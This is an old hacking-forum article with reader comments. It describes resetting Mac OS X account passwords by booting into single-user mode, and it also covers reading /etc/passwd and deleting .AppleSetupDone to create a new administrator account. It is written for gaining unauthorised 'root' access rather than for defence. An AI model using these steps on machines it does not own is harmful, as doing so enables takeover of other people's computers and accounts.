Follow us on Twitter!
Don't judge the unknown - Grindordie
Wednesday, April 23, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 31
Guests Online: 24
Members Online: 7

Registered Members: 82881
Newest Member: DARKLECTER
Latest Articles

Mac OS X Physical Security

Arrow Image Mac OS x security article



First, boot up in single user mode. On a Mac, you can do this by holding down Apple+S while it is booting.

(NOTE: You cannot enter single user or verbose mode if the computer owner or administrator has enabled Open Firmware Password Protection.)

From here, you can try several approaches. Some may not work.

METHOD 1:

Type in:
sh /etc/rc
passwd #accountname#

Type in the account name where #accountname# is and you will be prompted to type in the new password. Do so.

Type in:
reboot

(NOTE: If you have no idea what the accounts on the computer are, try \'root.\' If you want to find out, you can try the following commands:
cat /etc/groups
cat /etc/passwd
You may have to mount the drive with:
mount -uw /
first before you are able to use the command.)

METHOD 2:

Type in:
mount -uw /
fsck -y

(NOTE: fsck -y is a disk check utility. It is recommended that you run it after mounting the drive, but it is not required.)

Type in:
/sbin/SystemStarter
passwd #accountname#

Type in the account name where #accountname# is and you will be prompted to type in the new password. Do so.

Type in:
reboot

METHOD 3:

Type in:
mount -uw /
fsck -y
/usr/libexec/register_mach_bootstrap servers /etc/mach_init.d
cd /var/db/netinfo
netinfod -s local
SystemStarter
passwd #accountname#

Type in the account name where #accountname# is and you will be prompted to type in the new password. Do so.

Type in:
reboot

METHOD 4:

Type in:
mount -uw /
fsck -y
rm /var/db/.AppleSetupDone
reboot

With method four you have tricked the computer into thinking that you have not completed the Apple setup. You will be prompted to enter in administrator account information. Do so.

(NOTE: I have no idea how this affects files or accounts that are currently on the computer.)

And enjoy, with this tutorial you should be able to fully enjoy your \'root\' access ^_^


This article can be found at:
http://www.hackthissite.org/articles/read/802
I found it usefull so i submitted it.

Comments

spywareon September 24 2007 - 20:03:27
This isn't physical? It's not remote; that's something different. And also, are you akaritakai? Otherwise this is ripped: http://www.rootthisbox.net/articles/read/802/
02nwoodon September 27 2007 - 11:53:32
No.... I found it usefull though.
spywareon September 27 2007 - 13:03:40
Why did you edit out that only.samurai added the source? It's not nice to rip and not give credit. you know.
02nwoodon September 28 2007 - 09:35:49
only.samarai gave the wrong link to where it got ripped. He said it was from rtb when it was from hts
system_meltdownon October 06 2007 - 11:48:49
RTB is a sub-site of HTS...
02nwoodon October 08 2007 - 08:39:41
RTB only has a copy of HTS's (old) databse.... thats all
Zephyr_Pureon October 12 2007 - 01:34:45
I like the exchange of information, but I STRONGLY dislike when people rip articles and are reluctant to give credit. For that matter, I don't see why the article is called "Mac OS X Physical Security"... I see no "physical" techniques employed. This article would've probably been better if you had contributed anything practical to it, instead of reposting it verbatim.
Post Comment

Sorry.

You must have completed the challenge Basic 1 and have 100 points or more, to be able to post.